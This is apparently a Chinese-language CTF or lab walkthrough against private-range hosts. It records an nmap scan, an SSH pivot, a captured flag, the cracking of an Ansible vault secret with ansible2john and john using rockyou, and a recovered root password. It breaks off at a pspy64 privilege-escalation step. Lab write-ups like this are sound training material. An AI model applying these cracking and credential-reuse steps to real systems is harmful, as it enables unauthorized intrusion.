命令:nmap -A -Pn 192.168.243.173
Nmap initial output
Nmap scan report for 192.168.243.173
Host is up (0.21s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 1f:11:e4:0b:3b:8a:e3:12:e9:44:10:7a:c9:64:98:f3 (RSA)
| 256 8a:f7:59:6b:af:db:14:0a:e8:4f:2a:4d:c9:66:04:e7 (ECDSA)
|_ 256 d7:cf:21:25:eb:d2:7e:1a:b4:6b:77:41:56:bf:c8:c1 (ED25519)
8081/tcp closed blackice-icecap
8082/tcp closed blackice-alerts
Aggressive OS guesses: Linux 3.11 - 4.1 (93%), Linux 4.4 (93%), Linux 3.16 (90%), Linux 3.13 (90%), Linux 3.10 - 3.16 (88%), Linux 3.10 - 3.12 (88%), Linux 2.6.32 (88%), Linux 3.2 - 3.8 (88%), Linux 3.8 (88%), WatchGuard Fireware 11.8 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8082/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 192.168.243.172
2 205.18 ms 192.168.243.173
接192.168.243.172:
nottodd@cb2:/home/nottodd/.ssh/controlmaster$ ssh marks@cb3
获取flag:087fade67b1acec922746aa2694c704d
访问/opt/ansible目录,并查看webserver.yaml文件内容:
保存上图中红色框中内容,并破解密码:
python3 /usr/share/john/ansible2john.py ansible_webserver.txt > ansible2johnhash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt ansible2johnhash.txt
继续解密:
查看/etc/ansible/hosts:
尝试用获取的密码lifeintheantfarm结合root账户ssh登录192.168.243.171。
尝试对192.168.243.173进行提权,下载pspy64查看进程运行情况: